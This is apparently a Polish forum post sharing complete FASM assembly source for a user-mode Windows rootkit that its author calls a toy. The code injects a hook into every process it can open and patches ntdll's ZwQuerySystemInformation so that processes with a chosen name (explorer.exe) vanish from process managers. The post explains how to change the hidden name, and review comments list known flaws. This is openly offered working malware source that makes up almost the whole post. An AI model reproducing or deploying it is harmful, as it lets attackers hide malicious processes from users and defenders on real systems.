Taki prosty rootkit (a raczej zabawka), który ukrywa wszystkie procesy o określonej nazwie (explorer.exe) przed menedżerami procesów (nazwę możesz zmienić, ale nie zapomnij zmienić też argumentu nSize (104) przekazywanego do WriteProcessMemory, bo łańcuch leży na końcu bufora `hook`). Program niestety nie potrafi sprawdzić, czy proces został już otwarty i zahookowany, więc uruchamiam go tylko raz. A hooka na NtCreateProcessEx jakoś mi się nie chce zakładać, ani tym bardziej bawić się tokenami.

Metoda prymitywna, ale w trybie użytkownika (user mode) to przecież tylko zabawa.
Kod:
; Process-hiding toy for 32-bit Windows, written for FASM (flat assembler).
; For every process that OpenProcess grants PROCESS_ALL_ACCESS on, it:
;   1. allocates 4096 bytes of RWX memory in the target,
;   2. copies the 104-byte `hook` blob there (code + UTF-16 "explorer.exe"),
;   3. overwrites ntdll!ZwQuerySystemInformation+12 in the target with the
;      7-byte `jump` stub (mov edx,<hook> / jmp edx),
; so the hook runs after the real syscall returns and unlinks every
; SYSTEM_PROCESS_INFORMATION entry whose ImageName matches.
;
; Register roles (all live across API calls, none preserved on exit):
;   edi = address patched in every target: ZwQuerySystemInformation+12,
;         taken from this process's own IAT (assumes ntdll sits at the same
;         base in every target - TODO confirm for the OS in use)
;   ebp = local snapshot buffer, then the entry currently being walked
;   ebx = handle of the process currently being injected
;
; NOTE(review): the "+12" and the 7-byte write assume the classic stub layout
; `mov eax,N / mov edx,7FFE0300h / call [edx] / ret 10h`; starting at a
; 3-byte `ret 10h`, a 7-byte write runs 4 bytes past it into whatever follows
; the stub - verify the padding of the target ntdll before relying on this.
; NOTE(review): OpenProcess handles are never closed (no CloseHandle import),
; the original page protection is never restored, and the 409600-byte
; snapshot buffer is a fixed guess (any NTSTATUS != 0 simply ends the run).
format pe gui
; One RWX section: the code patches `jump` and `hook` in place below
; (`[hook+15]`, `[jump+1]`, `[hook+36]`) before copying them out.
section '' readable writeable executable
mov eax,[lstrcmpiW]            ; resolved here, reused verbatim inside every target
mov dword [hook+15],eax        ; patch imm32 of `mov ebx,<lstrcmpiW>` in the hook
mov edi,[ZwQuerySystemInformation]
add edi,12                     ; edi = offset of the stub's `ret 10h` (see NOTE above)
push 4                         ; flProtect = PAGE_READWRITE
push 0x1000                    ; flAllocationType = MEM_COMMIT
push 409600                    ; dwSize: fixed-size guess for the process snapshot
push 0                         ; lpAddress = NULL
push -1                        ; hProcess = current-process pseudo-handle
call [VirtualAllocEx]
test eax,eax
jz exit
mov ebp,eax                    ; ebp = snapshot buffer
push 0                         ; ReturnLength = NULL (required size is never learned)
push 409600                    ; SystemInformationLength
push ebp                       ; SystemInformation
push 5                         ; SystemInformationClass = SystemProcessInformation
call [ZwQuerySystemInformation]
test eax,eax
jnz exit                       ; any failure, incl. buffer too small -> give up silently
; Walk the snapshot: entries are chained by NextEntryOffset at offset 0.
list:
cmp dword [ebp],0              ; NextEntryOffset == 0 -> current entry was the last one
jz exit
add ebp,[ebp]                  ; advance; note the very first entry is never opened
push dword [ebp+68]            ; dwProcessId = UniqueProcessId (+0x44 in the 32-bit layout)
push 0                         ; bInheritHandle = FALSE
push 0x1F0FFF                  ; dwDesiredAccess = classic PROCESS_ALL_ACCESS mask
call [OpenProcess]
test eax,eax
jz list                        ; cannot open this process -> next entry
mov ebx,eax                    ; ebx = target handle (leaked: never closed)
push 0x40                      ; flProtect = PAGE_EXECUTE_READWRITE
push 0x1000                    ; flAllocationType = MEM_COMMIT
push 4096                      ; dwSize: one page for the 104-byte hook
push 0                         ; lpAddress = NULL
push ebx
call [VirtualAllocEx]
test eax,eax
jz list
mov ecx,eax                    ; ecx = remote address of the hook buffer
mov dword [jump+1],eax         ; patch imm32 of `mov edx,<remote hook>` in jump
add eax,78                     ; the name string starts at hook+78
mov dword [hook+36],eax        ; patch imm32 of `push <remote name string>` in the hook
push 0                         ; lpNumberOfBytesWritten = NULL
push 104                       ; nSize = sizeof hook (78 bytes code + 26 bytes string)
push hook
push ecx
push ebx
call [WriteProcessMemory]
test eax,eax
jz list
push ecx                       ; reserve a stack slot; VirtualProtectEx writes the old protection here
push esp                       ; lpflOldProtect = address of that slot
push 0x40                      ; flNewProtect = PAGE_EXECUTE_READWRITE
push 7                         ; dwSize = length of the jump patch
push edi                       ; lpAddress = ZwQuerySystemInformation+12 in the target
push ebx
call [VirtualProtectEx]
pop ecx                        ; drop the slot: ecx now holds the OLD protection, not the buffer (unused below)
test eax,eax
jz list
push 0                         ; lpNumberOfBytesWritten = NULL
push 7
push jump
push edi                       ; overwrite the stub's `ret 10h` with `mov edx,<hook> / jmp edx`
push ebx
call [WriteProcessMemory]
jmp list                       ; result ignored; protection is never restored
exit:
ret                            ; return from the entry point; eax is whatever the last call left
; `jump`: 7 bytes written over the target's ZwQuerySystemInformation+12.
;   BA imm32   mov edx,<remote hook>      (imm32 patched at jump+1)
;   FF E2      jmp edx
jump db 0xBA,0x00,0x00,0x00,0x00,0xFF,0xE2
; `hook`: 78 bytes of hand-encoded, position-independent 32-bit code followed
; by the UTF-16 name to hide ("explorer.exe" + NUL = 26 bytes), 104 bytes total.
; It runs in place of the stub's `ret 10h`, i.e. after the syscall returned,
; so [esp+4] is SystemInformationClass and eax the NTSTATUS. Disassembly
; (offsets relative to `hook`):
;   +0   cmp dword [esp+4],5      ; only SystemProcessInformation
;   +5   jne  -> +75              ; other class: plain ret 10h, eax untouched
;   +7   test eax,eax
;   +9   jne  -> +75              ; syscall failed: pass the status through
;   +11  push esi / push edi / push ebx
;   +14  mov ebx,imm32            ; lstrcmpiW, patched at hook+15
;   +19  mov esi,[esp+14h]        ; SystemInformation (arg 2) once 3 regs are pushed
;   +23  mov edi,esi              ; edi = previous entry, esi = current entry
;   +25  cmp dword [esi],0        ; loop head: NextEntryOffset == 0 -> +70
;   +28  je   -> +70
;   +30  add esi,[esi]            ; esi = next entry (the first entry is never compared)
;   +32  push dword [esi+3Ch]     ; ImageName.Buffer (UNICODE_STRING at +38h)
;   +35  push imm32               ; remote address of the name string, patched at hook+36
;   +40  call ebx                 ; lstrcmpiW(<name string>, entry ImageName)
;   +42  test eax,eax
;   +44  jne  -> +66              ; no match: prev = cur
;   +46  mov ecx,[esi]
;   +48  test ecx,ecx
;   +50  jne  -> +60
;   +52  mov dword [edi],0        ; matched entry is the last: terminate the list at prev
;   +58  jmp  -> +64
;   +60  add ecx,[edi]            ; prev.NextEntryOffset += cur.NextEntryOffset
;   +62  mov [edi],ecx            ; unlink cur; esi stays on it so its successor is checked next
;   +64  jmp  -> +25
;   +66  mov edi,esi              ; prev = cur
;   +68  jmp  -> +25
;   +70  pop ebx / pop edi / pop esi
;   +73  xor eax,eax              ; STATUS_SUCCESS
;   +75  ret 10h                  ; same 4-argument cleanup as the stub it replaces
;   +78  'explorer.exe' as UTF-16, NUL-terminated
; NOTE(review): ImageName.Buffer can be NULL for some entries (e.g. the
; System process); it is handed to lstrcmpiW without a check.
hook db 0x83,0x7C,0x24,0x04,0x05,0x75,0x44,0x85,0xC0,0x75,0x40,0x56,0x57,0x53,0xBB,0x00,0x00,0x00,0x00,0x8B,0x74,0x24,0x14,0x89,0xF7,0x83,0x3E,0x00,0x74,0x28,0x03,0x36,0xFF,0x76,0x3C,0x68,0x00,0x00,0x00,0x00,0xFF,0xD3,0x85,0xC0,0x75,0x14,0x8B,0x0E,0x85,0xC9,0x75,0x08,0xC7,0x07,0x00,0x00,0x00,0x00,0xEB,0x04,0x03,0x0F,0x89,0x0F,0xEB,0xD7,0x89,0xF7,0xEB,0xD3,0x5B,0x5F,0x5E,0x31,0xC0,0xC2,0x10,0x00,'e',0x00,'x',0x00,'p',0x00,'l',0x00,'o',0x00,'r',0x00,'e',0x00,'r',0x00,'.',0x00,'e',0x00,'x',0x00,'e',0x00,0x00,0x00
section '' import readable

; Import directory: one IMAGE_IMPORT_DESCRIPTOR per DLL. OriginalFirstThunk,
; TimeDateStamp and ForwarderChain are left 0, so FirstThunk is used both for
; lookup and for the resolved addresses. An all-zero descriptor ends the list.
dd 0,0,0,RVA ntdll_name,RVA ntdll_table
dd 0,0,0,RVA kernel32_name,RVA kernel32_table
dd 0,0,0,0,0

; Thunk tables. The loader overwrites each slot with the resolved address,
; which is why the code calls through `[Name]`. A zero dword ends each table.
ntdll_table:
ZwQuerySystemInformation dd RVA _ZwQuerySystemInformation
dd 0

kernel32_table:
lstrcmpiW dd RVA _lstrcmpiW
OpenProcess dd RVA _OpenProcess
VirtualAllocEx dd RVA _VirtualAllocEx
VirtualProtectEx dd RVA _VirtualProtectEx
WriteProcessMemory dd RVA _WriteProcessMemory
dd 0

; DLL names.
ntdll_name db 'ntdll.dll',0
kernel32_name db 'kernel32.dll',0

; IMAGE_IMPORT_BY_NAME entries: a zero hint word, then the NUL-terminated name.
_ZwQuerySystemInformation dw 0
db 'ZwQuerySystemInformation',0
_lstrcmpiW dw 0
db 'lstrcmpiW',0
_OpenProcess dw 0
db 'OpenProcess',0
_VirtualAllocEx dw 0
db 'VirtualAllocEx',0
_VirtualProtectEx dw 0
db 'VirtualProtectEx',0
_WriteProcessMemory dw 0
db 'WriteProcessMemory',0